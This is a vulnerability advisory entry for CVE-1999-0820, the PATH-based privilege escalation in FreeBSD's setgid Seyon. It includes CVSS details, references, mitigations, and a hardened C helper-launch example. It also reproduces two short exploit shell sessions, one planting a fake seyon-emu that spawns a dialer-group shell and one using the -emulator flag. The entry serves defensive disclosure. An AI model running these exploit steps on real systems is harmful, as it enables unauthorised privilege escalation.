CVE-1999-0820
CVSS 4.6
Published: 1999-12-01 00:00:00
Last revised: 2008-09-09 08:35:41

[Original] FreeBSD seyon allows users to gain privileges via a modified PATH variable for finding the xterm and seyon-emu commands.


[CNNVD] FreeBSD Seyon setgid dialer vulnerability (CNNVD-199912-012)

        FreeBSD's seyon contains a vulnerability. Users can gain privileges by modifying the PATH variable used to find the xterm and seyon-emu commands.

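- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0820
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0820
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-012
(Official data source) CNNVD

- Other links and resources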

http://www.securityfocus.com/bid/838
(UNKNOWN)  BID  838
http://www.osvdb.org/5996
(UNKNOWN)  OSVDB  5996

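- Vulnerability information

FreeBSD Seyon setgid dialer vulnerability
Medium Configuration error
1999-12-01 00:00:00 2005-05-02 00:00:00
Local
        FreeBSD's seyon contains a vulnerability. Users can gain privileges by modifying the PATH variable used to find the xterm and seyon-emu commands.

- Advisories and patches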

        Remove the setgid bit from seyon.

- Vulnerability information (19609)

Muhammad M. Saggaf Seyon 2.14 b Relative Path Vulnerability (EDBID:19609)
freebsd local
1999-11-08 Verified
0 Shawn Hillis
source: http://www.securityfocus.com/bid/780/info

Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the privileges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix.

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
setregid(getegid(), getegid());
system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$


		

- Vulnerability information

5996
FreeBSD seyon PATH Variable Subversion Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

FreeBSD contains the port seyon, which is flawed and may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user places a fake "seyon-emu" or "xterm" in a newly created directory and sets its PATH. Invoking seyon causes it to search the directories in $PATH for "xterm" and "seyon-emu"; once it locates either one, the fake is executed by seyon with seyon's privileges. This flaw may lead to a loss of integrity.

- Timeline

1999-11-08 Unknown
1999-11-08 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: chmod 750 `which seyon` and add selected users to the "dialer" group.

- Related references

- Vulnerability author

- Vulnerability information

FreeBSD Seyon setgid dialer Vulnerability
Configuration Error 838
No Yes
1999-12-01 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Brock Tellier <btellier@usa.net> on December 1, 1999.

- Affected program versions

FreeBSD FreeBSD 3.3

- Vulnerability discussion

FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow a malicious user to elevate privileges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself privileges which allow access to the communications devices or anything else accessible by the group dialer.

- Exploit

One of the methods to exploit seyon is shown below:

bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

- Solution

Remove the setgid bit from seyon.
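
Where a program has to remain setgid, the helper launch itself can be hardened so that neither a modified PATH nor a user-chosen emulator inherits the group: drop the effective group in the child and exec by absolute path with a fixed environment. The C code below is an added example, not Seyon's code or a FreeBSD patch; `spawn_helper`, `SAFE_ENV` and the use of /bin/sh as a stand-in helper are assumptions, as is the premise that the helper does not itself need the dialer group.

```c
/* Added example: hardened helper launch for a setgid program. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child: nothing is inherited from the caller. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/*
 * Run a helper by absolute path with the setgid privilege dropped.
 * Returns the child's exit status, or -1 if the request is refused
 * or the child could not be started. (Hypothetical helper name.)
 */
int spawn_helper(const char *abs_path, char *const argv[])
{
    /* Refuse anything that would need a PATH search or is cwd-relative. */
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: permanently give up the effective group before exec. */
        gid_t rgid = getgid();
        if (setregid(rgid, rgid) != 0 || getegid() != rgid)
            _exit(127);
        /* execve() does no PATH lookup and takes an explicit environment. */
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed demo: /bin/sh stands in for the real helper binary. */
    char *const args[] = { "sh", "-c", "echo \"child PATH=$PATH\"", NULL };
    printf("relative name -> %d\n", spawn_helper("seyon-emu", args));
    printf("absolute path -> %d\n", spawn_helper("/bin/sh", args));
    return 0;
}
```

With this pattern a user-supplied emulator still runs, but only with the invoking user's own group, which is the same outcome the advisory reaches by removing the setgid bit.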

- Related references

     

     
